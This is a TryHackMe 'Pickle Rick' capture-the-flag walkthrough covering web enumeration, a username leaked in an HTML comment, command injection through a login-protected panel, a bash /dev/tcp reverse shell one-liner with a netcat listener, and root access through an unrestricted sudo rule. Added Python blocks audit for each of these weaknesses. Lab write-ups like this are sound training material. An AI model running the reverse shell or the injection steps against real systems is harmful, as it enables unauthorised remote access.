Cyber Security Writeups

Pickle Rick TryHackMe Walkthrough writeup

Introduction

Hey folks, Volk here. In this writeup we are going to solve and explain the Pickle Rick challenge on TryHackMe.

This is a beginner-level challenge.

Tools Used

Enumeration

First, I scanned the target using Nmap to find the open ports, OS, versions, etc. with the following command:

nmap -A [Machine_IP]

-A: OS detection, Script Scanning, Version detection, and traceroute

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 bc:c7:d4:7c:21:45:0d:24:d1:30:3a:49:bf:76:5e:ed (RSA)
|   256 88:d5:bc:e4:d2:ef:2a:09:0f:e8:17:95:09:aa:46:77 (ECDSA)
|_  256 d5:bb:c3:48:97:21:55:2b:70:76:2e:07:4a:bf:70:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check port 80 (HTTP).

Nothing important, so I decided to check the source code:

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Rick is sup4r cool</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="assets/bootstrap.min.css">
  <script src="assets/jquery.min.js"></script>
  <script src="assets/bootstrap.min.js"></script>
  <style>
  .jumbotron {
    background-image: url("assets/rickandmorty.jpeg");
    background-size: cover;
    height: 340px;
  }
  </style>
</head>
<body>

  <div class="container">
    <div class="jumbotron"></div>
    <h1>Help Morty!</h1></br>
    <p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
    <p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
    I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
  </div>

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

</body>
</html>

Nice, we found a username leaked in the source code. We will need it later. I usually check robots.txt, since sometimes there is important information on this page. When I accessed it I found a word, and I guess that's the password.
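A pre-deployment check for the two leaks described above (credentials left in an HTML comment, a stray word in robots.txt), as an added example that is not part of the original writeup. The keyword list, the function names and the robots.txt sample are assumptions.

```python
import re
from html.parser import HTMLParser

# Words suggesting a comment holds credentials or internal notes (assumed list).
SENSITIVE = re.compile(r"\b(user(name)?|pass(word|wd)?|secret|token|api[_-]?key)\b", re.I)
# Field names a robots.txt line may legitimately start with.
ROBOTS_FIELDS = {"user-agent", "allow", "disallow", "sitemap", "crawl-delay"}


class CommentCollector(HTMLParser):
    """Collects HTML comments: hidden by the browser, still sent to every client."""
    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(" ".join(data.split()))  # collapse whitespace


def audit_html(html):
    """Return the comments that match a sensitive keyword."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [c for c in parser.comments if SENSITIVE.search(c)]


def audit_robots(text):
    """Return lines that are neither blank, comments, nor 'field: value' records."""
    odd = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        name, sep, _ = line.partition(":")
        if line and (not sep or name.strip().lower() not in ROBOTS_FIELDS):
            odd.append(line)
    return odd


# Constructed samples: trimmed page source, and a robots.txt with a placeholder bare word.
SAMPLE_HTML = """<body><h1>Help Morty!</h1><!-- jumbotron layout tweak -->
<!--
    Note to self, remember username!
    Username: R1ckRul3s
-->
</body>"""
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /assets/\nExampleBareWord\n"

if __name__ == "__main__":
    print(audit_html(SAMPLE_HTML), audit_robots(SAMPLE_ROBOTS))
```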

 

Now let's brute force directories using gobuster:

gobuster dir -u http://10.10.42.251/ -w /usr/share/dirb/wordlists/common.txt -x php,html 2

dir: use directory brute force

-u: to specify the target URL

-w: to specify the path of the wordlist you want to use 

-x: to specify the file extensions to try; each wordlist entry is also requested with .php and .html appended

That's the result:

===============================================================
/.hta.php             (Status: 403) [Size: 295]
/.hta.html            (Status: 403) [Size: 296]
/.hta                 (Status: 403) [Size: 291]
/.htaccess.php        (Status: 403) [Size: 300]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd.php        (Status: 403) [Size: 300]
/.htaccess.html       (Status: 403) [Size: 301]
/.htpasswd.html       (Status: 403) [Size: 301]
/assets               (Status: 301) [Size: 313] [--> http://10.10.42.251/assets/]
/denied.php           (Status: 302) [Size: 0] [--> /login.php]                   
/index.html           (Status: 200) [Size: 1062]                                 
/index.html           (Status: 200) [Size: 1062]                                 
/login.php            (Status: 200) [Size: 882]                                  
/portal.php           (Status: 302) [Size: 0] [--> /login.php]                   
/robots.txt           (Status: 200) [Size: 17]                                   
/server-status        (Status: 403) [Size: 300]                                  
                                                                                 
===============================================================

So I found a login directory (login.php)

I tried the username and the password that I found.

Username: R1ckRul3s

Password: Wubbalubbadubdub

And it worked 🙂

When I saw the command panel, the first thing that came to my mind was command injection, so I decided to type ls. It worked, but when I tried to use the cat command to read any text file, I got a message saying that the command is disabled (cat).

Gaining Access

I decided to use this bash reverse shell.

bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'

And I used Netcat to listen for incoming connections:

nc -lvp (PORT)

-l : to listen for incoming connections (listen mode)

-v : verbose

-p : to choose the port you want to listen on, for example: 1337

And we got a connection. Now we can run the cat command:

www-data@ip-10-10-42-251:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

By reading the Sup3rS3cretPickl3Ingred.txt file, we answered the first question.
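Why disabling cat in the panel contained nothing: a model of a denylist filter next to an allowlist that never invokes a shell, run over the inputs used on this page. This is an added example, not the challenge's portal.php (its source is not shown here); the filter model, the allowlist contents and all names are assumptions.

```python
import re
import shlex

DENYLIST = ("cat",)               # assumed model: the panel refuses these program names
ALLOWED = {"ls": 1, "whoami": 0}  # hypothetical allowlist: program -> max argument count
SAFE_ARG = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.]*")  # plain names only, no options or paths


def denylist_accepts(command):
    """Weak filter: refuse only when a banned word appears; everything else runs."""
    return not any(word in DENYLIST for word in command.split())


def allowlist_argv(command):
    """Hardened filter: return an argv to execute without a shell, or None to refuse."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    args = argv[1:]
    if len(args) > ALLOWED[argv[0]] or not all(SAFE_ARG.fullmatch(a) for a in args):
        return None
    return argv  # hand to subprocess.run(argv, shell=False), never to a shell


# Inputs taken from the page (IP and PORT are the page's own placeholders).
PAGE_INPUTS = [
    "ls",
    "cat Sup3rS3cretPickl3Ingred.txt",
    "bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'",
]


def compare(commands):
    """Return (command, denylist verdict, allowlist verdict) for each input."""
    return [(c, denylist_accepts(c), allowlist_argv(c) is not None) for c in commands]


if __name__ == "__main__":
    for command, weak, strict in compare(PAGE_INPUTS):
        print(f"denylist={weak!s:5} allowlist={strict!s:5} {command}")
```

The denylist stops only the one command it names, while the allowlist refuses anything that is not an expected program with expected arguments.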

And I found the second ingredient in the /home/rick directory:

$ cd /home/rick
$ ls
second ingredients
$ cat "/home/rick/second ingredients"
1 jerry tear

By reading the second ingredients file, we answered the second question.

Privilege Escalation

Usually, the last flag (in this challenge, the ingredients) is in the root directory, so let's try sudo -l to see the commands that can be executed by this user as root:

Matching Defaults entries for www-data on
    ip-10-10-42-251.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-42-251.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

Surprisingly, we can use any sudo command, so let's type sudo su to become root and change directory to /root to access the last file:

 

$ sudo su
#cd /root
#ls
3rd.txt
snap
#cat 3rd.txt
3rd ingredients: fleeb juice
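A check that flags the sudo rule shown above, written against the text that sudo -l prints. This is an added example, not from the original writeup; the service-account list, the function names and the "deploy" contrast rule are assumptions.

```python
import re

# Accounts that run network-facing services and should hold no sudo rights (assumed list).
SERVICE_ACCOUNTS = {"www-data", "nobody", "daemon"}
USER = re.compile(r"^User (\S+) may run the following commands")
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Parse `sudo -l` text into (user, rules); rules follow the 'User ...' line."""
    user, rules = None, []
    for line in output.splitlines():
        if (m := USER.match(line)):
            user = m.group(1)
        elif user and (m := RULE.match(line)):
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "commands": [c.strip() for c in m.group("cmds").split(",")],
            })
    return user, rules


def audit(output):
    """Return one finding string per reason a rule is dangerous."""
    user, rules = parse_sudo_l(output)
    found = []
    for rule in rules:
        if "ALL" in rule["commands"]:
            found.append(f"{user} may run ANY command as ({rule['runas']})")
            if rule["nopasswd"]:
                found.append(f"{user} needs no password for it (NOPASSWD)")
        if user in SERVICE_ACCOUNTS:
            found.append(f"service account {user} has a sudo rule: {rule['commands']}")
    return found


# The rule section of the page's `sudo -l` output, and a constructed scoped rule for contrast.
PAGE_OUTPUT = """User www-data may run the following commands on
        ip-10-10-42-251.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
"""
SCOPED_OUTPUT = """User deploy may run the following commands on host:
    (root) /usr/bin/systemctl reload apache2
"""

if __name__ == "__main__":
    print("\n".join(audit(PAGE_OUTPUT)))
```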

And we got the root flag (last flag) :). Thanks for reading the writeup, see you in the next writeup.

Volk_407
My name is Moustafa I am a Penetration tester 💻 | Bug Hunter 🐛 | Video Editor 🎥 Acknowledgements: Marvel/TWDC | Pinterest | Picsart | Vanilla Certifications: eJPT | eWPTX | eMAPT | ICCA | CAP